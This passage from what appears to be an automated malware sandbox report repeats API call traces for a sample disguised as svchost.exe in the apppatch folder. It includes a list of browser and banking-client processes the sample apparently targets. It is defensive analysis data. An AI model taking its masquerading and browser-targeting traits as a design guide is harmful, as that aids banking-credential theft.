CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	2_2_02D167D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,IsUserAnAdmin,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	2_2_02D167D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,IsUserAnAdmin,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	2_2_02D167D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,IsUserAnAdmin,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	2_2_02D167D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,IsUserAnAdmin,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	2_2_02D167D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,IsUserAnAdmin,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	2_2_02D167D0
Source: C:\Windows\apppatch\svchost.exe	Code function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe	2_2_02D11660
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	2_2_02D037E0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	2_2_02D037E0
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	2_2_02D037E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	4_2_012F7300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	4_2_012F7300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	4_2_012F7300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	4_2_012F67D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	4_2_012F67D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	4_2_012F67D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	4_2_012F67D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	4_2_012F67D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandl